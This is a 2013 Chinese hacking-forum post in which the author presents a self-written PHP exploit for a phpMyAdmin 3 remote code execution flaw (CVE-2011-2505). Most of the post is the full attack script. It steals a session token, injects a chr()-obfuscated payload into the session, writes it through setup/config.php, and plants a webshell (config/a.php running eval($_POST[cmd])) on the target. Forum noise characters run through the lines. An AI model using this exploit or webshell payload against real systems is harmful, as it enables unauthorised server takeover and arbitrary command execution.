找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2282|回复: 0
打印 上一主题 下一主题

phpadmin3 remote code execute php版本exploit

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。# E% ]' `( Y+ K: M# ^

# j1 A" n0 g+ ?昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
4 V" t- `" p' t5 m* @+ n  j0 t5 ~5 m' D; \2 L4 a
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
3 `9 P' M- w2 n! [6 L( b6 Q2 c( s一是session.auto_start = 1;7 r; O' h$ e4 t1 ]7 M
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
4 p" l+ x2 _+ k1 n" I( G& O当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
8 G* V9 y# o5 E4 C" S
4 d! E- e) h- n. `  r在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
% ?0 u4 e2 _2 E
" c! j/ v6 c# D! z* A0 L' r* |于是写了这个php版本的exp,代码如下:
4 @3 X+ p3 K3 r7 e0 ~9 F" W7 O% b( J7 M/ M
#!/usr/bin/php
; }1 d# k9 `$ y9 t<?php
2 A) J+ z. d; L% l# C( Yprint_r('/ i8 V' J- j* n" x$ }7 ?6 D
+---------------------------------------------------------------------------+% {8 X' y% C, ?  o. J' N) M
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
9 y1 n6 J. [! w# ^' Cby oldjun(www.oldjun.com)
2 ]! R, H) f% N; D# @8 k& V4 Cwelcome to www.t00ls.net
9 [3 `8 p2 c& \" S3 R. ~mail: oldjun@gmail.com6 E: `" N6 Z" N7 q7 N$ H6 o
Assigned CVE id: CVE-2011-2505
9 C0 X; a! c7 o/ f0 h+---------------------------------------------------------------------------+
, g2 L9 K! p' L, G& l& J');) z  ]' }' j2 V& {* o7 @

& s4 z1 k! k9 F  y2 e/**  Z- }! D! `( F4 x
* working when the directory:"config" exists and is writeable.
' C3 [8 G+ c  ~& ]7 ]& g**/2 k$ H  ~$ w+ F
/ \; j3 I! _# P# A* y& o' T, k
if ($argc < 3) {, i* k8 |4 [6 Q5 S1 f; E
    print_r('  _. |- j* n0 f2 ]# W! D9 @) `& d8 m
+---------------------------------------------------------------------------+) N4 C3 P* }# Z( \/ W" C/ @
Usage: php '.$argv[0].' host path
; @2 y$ R% X! H/ J1 O. |  m+ phost:      target server (ip/hostname)3 C; T! a6 ^5 ?+ c
path:      path to pma3% x& o- }, C& y+ K) H
Example:
1 w) h4 f$ b4 aphp '.$argv[0].' localhost /pma/* k: e. y* Q& `3 F+ C, z. b
+---------------------------------------------------------------------------++ I) C6 K* h( b4 Y- `: t! l
');) e" ]; s) @" ~6 E+ F
    exit;. r( e5 Q/ _& m/ Q4 D
}
( H  P6 Z1 a$ V' _+ p7 o
+ _3 o  Y8 d# _  v2 |' F% u% A" W$host = $argv[1];4 u$ m( M, F9 }- l
$path = $argv[2];, n! K* Q1 K3 c$ C& C& @
+ U" o1 s0 `) B. c3 A: `
/**+ X& \$ ?# z! W6 Z! l2 W
* Try to determine if the directory:"config" exists& H+ d$ C) [: a" I" A
**/
% O8 ~; l- \3 I/ o/ X5 X# g7 Zecho "[+] Try to determine if the directory:config exists....\n";
# W$ r1 w1 \- Q) j1 Z" r# F$returnstr=php_request('config/');
# A. |9 s9 x- Y/ D6 Q7 tif(strpos($returnstr,'404')){4 k& i0 y- D6 j  [- P* v1 o7 J$ i
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
4 x4 T( Y" @" ]/ C0 Z}* H5 d) k5 c  c/ C; U
' g5 i0 l7 I; W' Z
/**$ }* B6 k0 i3 Y5 b) E7 O6 o
* Try to get token and sessionid6 t: g# W0 Z/ l+ M0 B& \
**// T+ G5 d% u. L. F
echo "[+] Try to get token and sessionid....\n";
; u( g0 q, }4 f7 i9 n8 d. m, D$result=php_request('index.php');2 v* O; [6 R) E+ d% r( ]& ?8 W
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);# \% _  c& Q3 C" v) @
$token=$resp[3];8 \6 J4 V3 @- G1 I, p9 s# q( n
$sessionid=$resp[1];
. _# J1 }/ t, q3 B* Zif($token && $sessionid){% @5 W/ T5 N1 _8 J0 e+ Y
    echo "[+] tokentoken\n";$ n4 P- Q/ Q9 M& F
    echo "[+] Session IDsessionid\n";8 W* o0 U) G( D( f
}else{
$ z9 k( f" R1 `) J; s2 q    exit("[-] Can't get token and Session ID,Exploit Failed!\n");! F1 V* @! Q/ X/ g  ]6 W
}
* q- u8 U' F3 K4 o6 ?( e. L0 z. _
' w" x3 r7 P% j) J* k. V% B8 z/**7 g6 I& H: X+ {+ `- N
* Try to insert shell into session
" B+ L  P* q! V: H**/
9 v1 d) p# A1 Y7 eecho "[+] Try to insert shell into session....\n";
) o) I- ~7 K1 ~; r( lphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
  n/ ]: c/ w6 a: Q5 ^
7 O' K, n; R) A) P4 b/**
) M6 F! V- f" m3 F( _! }  A * Try to create webshell
% s3 t2 ]1 _% @! u4 I( t**/
5 i/ ^9 l3 P% ~' ~' D6 v. ?7 mecho "[+] Try to create webshell....\n";% e$ s7 I$ D  }# b
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);' s2 G! B; D8 N% Q, X* z
/**7 X, e# a) H: `; d  S
* Try to check if the webshell was created successfully0 V: q5 F( A8 g* ?
**/3 E+ o) I2 Q3 m
echo "[+] Try to check if the webshell was created successfully....\n";" a' i% h. e$ U/ M  V9 _
$content=php_request('config/config.inc.php');
  C6 m7 {  C( h5 bif(strpos($content,'t00ls')){
! {4 z# ]% D& g" c8 G9 A) g    echo "[+] Congratulations! Expoilt successfully....\n";8 u, I9 o! c, P* @3 c" M
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";+ h' @# E- G3 N6 F! W7 e
}else{
$ E0 S# |# Q/ M    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
7 ?8 t( U+ z* r0 F* p  k( h1 f}& x% f3 F2 o+ B9 y% @
$ p$ r& B2 U/ O5 w
function php_request($url,$data='',$cookie=''){1 M5 z. s- n& Y
    global  $host, $path;
; U% G6 y+ G) C7 c( ~* K   
+ ^" U6 N) O9 n* J    $method=$data?'POST':'GET';
# m* _3 @/ P$ a: t! _& u8 i   
# z9 ?1 P! u. V: p# H1 \! |    $packet = $method." ".$path.$url." HTTP/1.1\r\n";' |; j; T4 l& X4 C: W
    $packet .= "Accept: */*\r\n";8 [( m( h9 J+ z2 p9 d$ q
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";: A" k& w- p8 Z; p- a
    $packet .= "Host: $host\r\n";
' |# e% a! \4 A$ p" i9 F' p$ M& v! s$ i    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";8 W$ E# {0 l1 |& T9 H
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
3 s5 u0 u0 ~+ a. b5 ~' `8 W    $packet .= $cookie?"Cookie: $cookie\r\n":"";
7 F! {, ?; o# R' i2 B& i$ \" @    $packet .= "Connection: Close\r\n\r\n";$ t& c7 q2 G4 k& R& C2 [! b
    $packet .= $data?$data:"";( N4 H+ g& k* L
. l+ }0 d3 O1 f1 P6 i
    $fp = fsockopen(gethostbyname($host), 80);
+ N6 d5 W+ Z7 J- F    if (!$fp) {
' V; K6 Z3 Y2 N9 \    echo 'No response from '.$host; die;" `' j3 u+ b# ~0 T% h" v
    }
2 K  u$ s# D2 t; W4 Z2 r; C5 X- a    fputs($fp, $packet);" g% v* s/ a+ a# _1 D
) T  A& g8 w: d+ U6 q9 N
    $resp = '';7 h/ E' H( n8 T  K; f6 y5 G
- ]. V+ n" D7 M; Z2 _* l
    while ($fp && !feof($fp))
0 @& m: c6 v" T; q        $resp .= fread($fp, 1024);
; S- H5 u" p" L* k; S
6 V$ `" A2 L1 N6 J1 r    return $resp;
, H9 h/ j$ F. ~! }$ z}
7 D- F, R5 l% G5 U# q2 h8 Z/ N    : m& _; K) l, M! r3 L
?> 7 f1 r5 f4 K7 I' _3 C
.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表